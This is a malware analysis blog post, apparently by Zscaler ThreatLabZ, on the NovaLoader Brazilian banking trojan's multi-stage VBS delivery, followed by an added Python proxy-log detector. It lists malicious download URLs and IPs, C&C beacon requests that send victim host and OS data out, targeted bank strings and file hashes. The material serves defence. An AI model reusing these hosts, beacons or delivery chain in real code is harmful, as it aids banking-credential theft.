As part of our daily threat tracking activity, ThreatLabZ researchers recently came across an interesting Brazilian banking malware campaign. The malware, NovaLoader, was written in Delphi and makes extensive use of the Visual Basic Script (VBS) scripting language. Although the final payload was not entirely new and has been discussed by other security researchers, we found that the multi-stage payload delivery was unique.

Delivery method
In earlier documented campaigns, the delivery methods for this malware included spam, social engineering, and fake sites for popular software such as Java. The malware operators use a variety of available options to ensure malware delivery and try to avoid detection by security products. They often do so by abusing popular legitimate services like Dropbox, GitHub, Pastebin, AWS, GitLab, and others, as well as URL shorteners and dynamic DNS services such as No-IP and DynDNS. NovaLoader is known to use AutoIt, PowerShell, and batch scripts in the infection chain, but this is the first time we have seen it use VBS. In this campaign, it is also using encrypted scripts instead of simply obfuscated ones.

Fig. 1: NovaLoader infection flow

Main Dropper
MD5: 4ef89349a52f9fcf9a139736e236217e
The main dropper is very simple; its only purpose is to decrypt the embedded VB script and run the decrypted script.

Fig. 2: Stage 1 VB script decryption loop

Stage 1 Script
Embedded script before and after decryption:

Fig. 3: VB script before and after decryption

This VBS file decrypts a URL (dwosgraumellsa[.]club/cabaco2.txt), downloads another encrypted script from it, and runs that script after decryption.

Fig. 4: Download request for the next stage, an encrypted payload

Stage 2 Script
The downloaded VB script looks like the following after decryption:

Fig. 5: VBS after decryption

The VB script sends a GET request to “http://54.95.36[.]242/contaw.php”, possibly to let the command-and-control (C&C) server know that it is running on the system.
After that, it tries to detect the presence of a virtual environment using Windows Management Instrumentation (WMI) queries, as shown below.

Fig. 6: VM detection code

NovaLoader copies the following executable files into the directory C:\Users\Public\:
C:\Windows\(system32|SysWOW64)\rundll32.exe
C:\Windows\(system32|SysWOW64)\Magnification.dll

Fig. 7: C&C notification request

After that, it downloads the following files from 32atendimentodwosgraumell[.]club:
32atendimentodwosgraumell[.]club/mi5a.php, decrypted and saved at C:\Users\Public\{random}4.zip
32atendimentodwosgraumell[.]club/mi5a1.zip, saved at C:\Users\Public\{random}1.zip
32atendimentodwosgraumell[.]club/mi5asq.zip, saved at C:\Users\Public\{random}sq.zip

Then it sends multiple GET requests to “54.95.36.242/contaw{1-7}[.]php”:

GET /contaw.php
GET /contaw2.php?w={redacted}BIT-PC_Microsoft%20Windows%207%20Professional%20_True
GET /contaw3.php?w={redacted}BIT-PC
GET /contaw4.php?w={redacted}BIT-PC
GET /contaw5.php?w={redacted}BIT-PC
GET /contaw6.php?w={redacted}BIT-PC_2/1/2019%205:05:06%20PM
GET /contaw7.php?w={redacted}BIT-PC_2/1/2019%205:05:06%20PM_CD=414KbCD1=9160Kb_

Fig. 8: Multiple C&C requests

It also drops several files into the C:\Users\Public\ directory:

Dropped file    MD5                                Comment
DST.exe         51138BEEA3E2C21EC44D0932C71762A8   copied rundll32.exe
I               3DC26D510907EAAC8FDC853D5F378A83   encrypted file containing various values, such as version and extension
I_              A34F1D7ED718934185EC96984E232784   encrypted configuration file
KC              89473D02FEB24CE5BDE8F7A559631351   similar to the file named "I"
mwg.dll         F3F571288CDE445881102E385BF3471F   copied Magnification.dll
PFPQUN.DST      8C03B522ACB4DDC7F07AB391E79F1601   support DLL to decrypt the main payload
PFPQUN1.DST     F3D4520313D05C66CEBA8BDA748C0EA9   encrypted main payload
winx86.dll      87F9E5A6318AC1EC5EE05AA94A919D7A   SQLite DLL

Fig. 9: Files dropped by script

Finally, it executes the exported function of the decrypted DLL using the copied rundll32.exe.

Fig. 10: Executing the stage-3 payload

The stage-3 payload is a DLL file that acts as a loader for the final payload. It is run via rundll32.exe, and its purpose is to decrypt and load the final payload.

Final payload
The final payload is written in Delphi. It has multiple capabilities, including stealing victims' credentials for several Brazilian banks. It monitors browser window titles for bank names, and if a targeted tab is found, the malware can take control of the system and block the victim from the real bank's page while it carries out its nefarious activity under the direction of its C&C. Its activity is quite similar to the well-known Overlay RAT. Some of the interesting commands used by the malware, described by function (the command strings are shown in Fig. 11):
To stabilize the socket connection
Sends infected OS details
Checking the status of the connection
Close all connections
Sends keystrokes to the active application window
Set mouse position
Set mouse left button down
Set mouse left button up
Set mouse right button up
Set mouse right button down
Share the compromised system's desktop
Check gets in C&C response to check if data is correct reply with

Fig. 11: NovaLoader C&C commands

There were many interesting strings related to Brazilian banks found in the malware:

String in malware            Corresponding bank site
caixa                        http://www.caixa.gov.br
bancodobrasil                https://www2.bancobrasil.com.br
bbcombr                      https://www.bb.com.br/
bradesco                     https://banco.bradesco/
santander                    https://www.santander.com.br/
bancodaamazonia              https://www.bancoamazonia.com.br/
brbbanknet                   https://brbbanknet.brb.com.br/netbanking/
banese                       https://www.banese.com.br/
banestes                     https://www.banestes.com.br/
bancodoestadodopar           https://www.banpara.b.br/
bancobs2                     https://www.bs2.com/
citibankbrasil               https://www.citibank.com.br
bancofibraonline             https://www.bancofibra.com.br/
agibank                      https://www.agibank.com.br/
bancoguanabara               http://www.bancoguanabara.com.br/
ccbbrasil                    http://www.br.ccb.com
bancoindusval                https://www.bip.b.br/ir
internetbankingbancointer    https://internetbanking.bancointer.com.br/
modalbanking                 https://modalbanking.modal.com.br/
bancopan                     https://www.bancopan.com.br/
pineonline                   https://www.pine.com/

Fig. 12: Some of the targeted bank strings found in the malware

Conclusion
Brazilian actors are among the top contributors to global cybercrime, and they are always coming up with new ways to infect their targets using spam, social engineering, and phishing. In this campaign, we observed them targeting Brazilian financial institutions using malware written in Delphi. The Zscaler ThreatLabZ team is actively tracking and reviewing all malicious payloads to ensure that our customers are protected.
IOCs

MD5
60e5f9fe1b778b4dc928f9d4067b470b
4ef89349a52f9fcf9a139736e236217e
100ff8b5eeed3fba85a1f64db319ff40
99471d4f03fb5ac5a409a79100cd9349
cb2ef5d8a227442d0156de82de526b30
a16273279d6fe8fa12f37c57345d42f7
ac4152492e9a2c4ed1ff359ee7e990d1
fdace867e070df4bf3bdb1ed0dbdb51c
4d5d1dfb84ef69f7c47c68e730ec1fb7
6bf65db5511b06749711235566a6b438
c5a573d622750973d90af054a09ab8dd
ef5f2fd7b0262a5aecc32e879890fb40
35803b81efc043691094534662e1351c
34340c9045d665b800fcdb8c265eebec
a71e09796fb9f8527afdfdd29c727787
5a9f779b9cb2b091c9c1eff32b1f9754
a7117788259030538601e8020035867e
cb9f95cec3debc96ddc1773f6c681d8c
a7722ea1ca64fcd7b7ae2d7c86f13013

URLs
185[.]141[.]195[.]5/prt1.txt
185[.]141[.]195[.]81/prt3.txt
185[.]141[.]195[.]74/prt1.txt
dwosgraumellsa[.]club/cabaco2.txt
wn5zweb[.]online/works1.txt
23[.]94[.]243[.]101/vdb1.txt
167[.]114[.]31[.]95/gdo1.txt
167[.]114[.]31[.]93/gdo1.txt
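The stage-2 script's check-in traffic (the contaw.php through contaw7.php requests, with the victim's hostname and OS string in the w parameter) and the hosts listed in the IOCs above are what a defender would look for in web-proxy logs. The following is an added example, not Zscaler's code: a Python scanner that refangs the published indicators, flags requests to those hosts, separately flags the beacon path pattern on its own (lower confidence), and pulls the victim tag out of the query string. The log lines, their "timestamp client method url status" layout and the LAB-PC hostname are constructed for illustration, not taken from any particular proxy or from the campaign.

```python
"""Proxy-log detection for the NovaLoader C&C traffic described in the post.

Added example, not Zscaler's code. The host indicators are the ones listed
in the post (kept in their defanged form and refanged at load time); the
beacon-path pattern is derived from the contaw{1-7}.php requests shown in
Fig. 8. The log lines and the 'LAB-PC' hostname below are constructed for
illustration and follow an assumed "timestamp client method url status"
layout, not any particular proxy's format.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Network indicators from the post, as published (defanged with [.]).
IOC_HOSTS_DEFANGED = [
    "54.95.36[.]242",
    "32atendimentodwosgraumell[.]club",
    "dwosgraumellsa[.]club",
    "wn5zweb[.]online",
    "185[.]141[.]195[.]5",
    "185[.]141[.]195[.]81",
    "185[.]141[.]195[.]74",
    "23[.]94[.]243[.]101",
    "167[.]114[.]31[.]95",
    "167[.]114[.]31[.]93",
]

# The stage-2 script walks through contaw.php, contaw2.php ... contaw7.php.
BEACON_PATH = re.compile(r"^/contaw[1-7]?\.php$")


def refang(indicator):
    """Turn the published, defanged indicator back into a matchable host."""
    return indicator.replace("[.]", ".").replace("hxxp", "http")


IOC_HOSTS = {refang(h) for h in IOC_HOSTS_DEFANGED}

# Constructed sample log (assumed layout: time client method url status).
SAMPLE_LOG = """\
2019-02-01T17:05:01Z 10.0.0.5 GET http://www.example.com/index.html 200
2019-02-01T17:05:02Z 10.0.0.5 GET http://dwosgraumellsa.club/cabaco2.txt 200
2019-02-01T17:05:06Z 10.0.0.5 GET http://54.95.36.242/contaw.php 200
2019-02-01T17:05:06Z 10.0.0.5 GET http://54.95.36.242/contaw2.php?w=LAB-PC_Microsoft%20Windows%207%20Professional%20_True 200
2019-02-01T17:05:07Z 10.0.0.5 GET http://54.95.36.242/contaw7.php?w=LAB-PC_2/1/2019%205:05:06%20PM_CD=414KbCD1=9160Kb_ 200
2019-02-01T17:05:09Z 10.0.0.7 GET http://intranet.example.com/contaw.php 200
"""


def scan_proxy_log(text):
    """Return one alert per suspicious request, with the reasons it matched."""
    alerts = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 5:
            continue          # malformed line; skip rather than crash
        when, client, _method, url, _status = fields[:5]
        parts = urlsplit(url)
        reasons = []
        if parts.hostname in IOC_HOSTS:
            reasons.append("ioc-host")
        if BEACON_PATH.match(parts.path):
            reasons.append("beacon-path")   # weaker: pattern only
        if not reasons:
            continue
        # The 'w' parameter carries the victim hostname, OS string and
        # timestamps; parse_qs splits on the first '=' so the embedded
        # "CD=...Kb" fragments stay inside the value.
        victim_tag = parse_qs(parts.query).get("w", [None])[0]
        alerts.append({
            "time": when, "client": client, "host": parts.hostname,
            "path": parts.path, "reasons": reasons, "victim_tag": victim_tag,
        })
    return alerts


def infected_clients(alerts):
    """Clients that talked to a known indicator host (high confidence)."""
    return sorted({a["client"] for a in alerts if "ioc-host" in a["reasons"]})


if __name__ == "__main__":
    found = scan_proxy_log(SAMPLE_LOG)
    for a in found:
        print(a["time"], a["client"], a["host"] + a["path"],
              a["reasons"], a["victim_tag"])
    print("infected clients:", infected_clients(found))
```

A path-only match (the intranet line in the sample) is reported but not counted as an infection, since contaw.php on an unrelated host is only a weak signal; a hit on a listed host is what should drive containment, and the extracted victim tag names the machine to pull for the dropped-file artefacts under C:\Users\Public\.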